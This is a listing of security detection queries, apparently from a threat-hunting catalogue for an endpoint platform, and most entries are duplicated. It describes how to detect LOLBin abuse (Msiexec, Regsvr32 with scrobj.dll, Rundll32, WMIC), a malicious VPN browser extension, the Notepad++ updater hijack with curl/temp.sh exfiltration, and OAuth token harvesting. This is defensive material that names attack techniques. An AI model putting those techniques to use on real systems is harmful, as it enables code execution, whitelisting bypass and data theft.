EXPLORE DETECTIONS
LOLBin Msiexec
This query detects the use of Msiexec.exe. Msiexec.exe β A Windows Installer utility that executes MSI packages or DLLs (including remote or transformed payloads), frequently misused by attackers for stealthy code execution and application control bypass. [LOLBAS - Msiexec.exe](https://lolbas-project.github.io/lolbas/Binaries/Msiexec/)
LOLBin Regsvr32
This query detects the use of Regsvr32 when it has loaded scrobj.dll. Regsvr32.exe β A native Windows tool designed to register DLLs, but frequently misused by attackers to execute remote or local scriptlets (SCT files)βoften enabling Application Whitelisting bypass and stealthy code execution. [LOLBAS - Regsvr32.exe](https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/)
LOLBin Regsvr32
This query detects the use of Regsvr32 when it has loaded scrobj.dll. Regsvr32.exe β A native Windows tool designed to register DLLs, but frequently misused by attackers to execute remote or local scriptlets (SCT files)βoften enabling Application Whitelisting bypass and stealthy code execution. [LOLBAS - Regsvr32.exe](https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/)
LOLBin Rundll32
This query detects the use of Rundll32 from parents that are known for misuse. Rundll32.exe β A native Windows binary that can be abused to execute DLLs, scripts, and other payloads, making it a common technique in Living-off-the-Land attacks. [LOLBAS - Rundll32.exe](https://lolbas-project.github.io/lolbas/Binaries/Rundll32/)
LOLBin Rundll32
This query detects the use of Rundll32 from parents that are known for misuse. Rundll32.exe β A native Windows binary that can be abused to execute DLLs, scripts, and other payloads, making it a common technique in Living-off-the-Land attacks. [LOLBAS - Rundll32.exe](https://lolbas-project.github.io/lolbas/Binaries/Rundll32/)
LOLBin WMIC
This query detects the use of WMIC. Wmic.exe β A built-in Windows tool for scripting and remote system management, which adversaries exploit to run commands, load executables via alternate data streams, execute remote or XSL-formatted payloads, and move files stealthily. [LOLBAS - Wmic.exe](https://lolbas-project.github.io/lolbas/Binaries/Wmic/)
LOLBin WMIC
This query detects the use of WMIC. Wmic.exe β A built-in Windows tool for scripting and remote system management, which adversaries exploit to run commands, load executables via alternate data streams, execute remote or XSL-formatted payloads, and move files stealthily. [LOLBAS - Wmic.exe](https://lolbas-project.github.io/lolbas/Binaries/Wmic/)
Malicious Chrome Extension FreeVPN-One Detection
This Logic detects the presence of the malicious Chrome extension FreeVPN[.]One by identifying its unique extension ID across installed browsers. The logic further correlates this presence with network communications initiated by the extension to suspicious or untrusted domains. By combining extension enumeration with traffic analysis, the detection ensures high fidelity with minimal false positives. This layered approach strengthens visibility into malicious browser add-ons masquerading as VPN tools. Reference: [GitHub Aamir-Muhammad/CrowdStrike-Queries](https://github.com/Aamir-Muhammad/CrowdStrike-Queries/blob/main/Hunting-Queries/Malicious-Chrome-Extension-FreeVPN.One-Detection.md)
Malicious Chrome Extension FreeVPN-One Detection
This Logic detects the presence of the malicious Chrome extension FreeVPN[.]One by identifying its unique extension ID across installed browsers. The logic further correlates this presence with network communications initiated by the extension to suspicious or untrusted domains. By combining extension enumeration with traffic analysis, the detection ensures high fidelity with minimal false positives. This layered approach strengthens visibility into malicious browser add-ons masquerading as VPN tools. Reference: [GitHub Aamir-Muhammad/CrowdStrike-Queries](https://github.com/Aamir-Muhammad/CrowdStrike-Queries/blob/main/Hunting-Queries/Malicious-Chrome-Extension-FreeVPN.One-Detection.md)
MFA Failures
Displays the count of MFA authentication failures caused by service errors or user not being enrolled. A sudden spike in these errors may indicate a service incident requiring immediate investigation and response.
MFA Failures
Displays the count of MFA authentication failures caused by service errors or user not being enrolled. A sudden spike in these errors may indicate a service incident requiring immediate investigation and response.
MFA Status Monitoring
Displays Multi-Factor Authentication (MFA) status events over time. Monitor for unexpected spikes in denials, errors, or timeouts that may indicate security threats, system issues, or user experience problems requiring investigation.
MFA Status Monitoring
Displays Multi-Factor Authentication (MFA) status events over time. Monitor for unexpected spikes in denials, errors, or timeouts that may indicate security threats, system issues, or user experience problems requiring investigation.
MongoDB Processes on Windows & Linux Hosts (CVE-2025-14847)
This query identifies Windows and Linux Hosts running MongoDB processes.
MongoDB Processes on Windows & Linux Hosts (CVE-2025-14847)
This query identifies Windows and Linux Hosts running MongoDB processes.
New API Keys within the Falcon Platform
This query provides a list of newly created API Keys, including relevant details such as Client Name and Client ID.
New API Keys within the Falcon Platform
This query provides a list of newly created API Keys, including relevant details such as Client Name and Client ID.
New installed Sensors
This query loads host inventory data from aid_master_main.csv, enriches it with details from aid_master_details.csv, and outputs a cleaned, formatted table of host information.
New installed Sensors
This query loads host inventory data from aid_master_main.csv, enriches it with details from aid_master_details.csv, and outputs a cleaned, formatted table of host information.
Notepad++ supply chain attack
This query detects a state-sponsored supply chain attack where the legitimate Notepad++ updater (gup.exe) is hijacked to download the Chrysalis backdoor. It identifies the attack by spotting unauthorized network connections from the updater, malicious DLL side-loading (e.g., BluetoothService.exe loading log.dll), and data exfiltration commands involving curl and temp.sh. https://notepad-plus-plus.org/news/hijacked-incident-info-update/ https://notepad-plus-plus.org/news/clarification-security-incident/ https://securelist.com/notepad-supply-chain-attack/118708/ https://notepad-plus-plus.org/assets/data/IoCFromFormerHostingProvider.txt https://www.rapid7.com/blog/post/tr-chrysalis-backdoor-dive-into-lotus-blossoms-toolkit/
Notepad++ supply chain attack
This query detects a state-sponsored supply chain attack where the legitimate Notepad++ updater (gup.exe) is hijacked to download the Chrysalis backdoor. It identifies the attack by spotting unauthorized network connections from the updater, malicious DLL side-loading (e.g., BluetoothService.exe loading log.dll), and data exfiltration commands involving curl and temp.sh. https://notepad-plus-plus.org/news/hijacked-incident-info-update/ https://notepad-plus-plus.org/news/clarification-security-incident/ https://securelist.com/notepad-supply-chain-attack/118708/ https://notepad-plus-plus.org/assets/data/IoCFromFormerHostingProvider.txt https://www.rapid7.com/blog/post/tr-chrysalis-backdoor-dive-into-lotus-blossoms-toolkit/
OAuth2 Token Burst β Token Harvesting (Microsoft Defender for Identity)
Detects a sudden surge in OAuth2 token requests or acquisitions within a short timeframe, as identified by Microsoft Defender for Identity. This behavior may indicate token harvesting activity, where an attacker attempts to obtain multiple access tokens to abuse authentication sessions and maintain unauthorized access. Detects a sudden surge in OAuth2 token requests or acquisitions within a short timeframe, as identified by Microsoft Defender for Identity. This behavior may indicate token harvesting activity, where an attacker attempts to obtain multiple access tokens to abuse authentication sessions and maintain unauthorized access.
OS Platform ratio
This query aggregates SensorHeartbeat events by operating system platform to show the relative distribution of endpoints per OS. It is well suited for visualization as a pie chart, providing a quick overview of platform coverage and identifying imbalances or unexpected OS presence in the environment.
OS Platform ratio
This query aggregates SensorHeartbeat events by operating system platform to show the relative distribution of endpoints per OS. It is well suited for visualization as a pie chart, providing a quick overview of platform coverage and identifying imbalances or unexpected OS presence in the environment.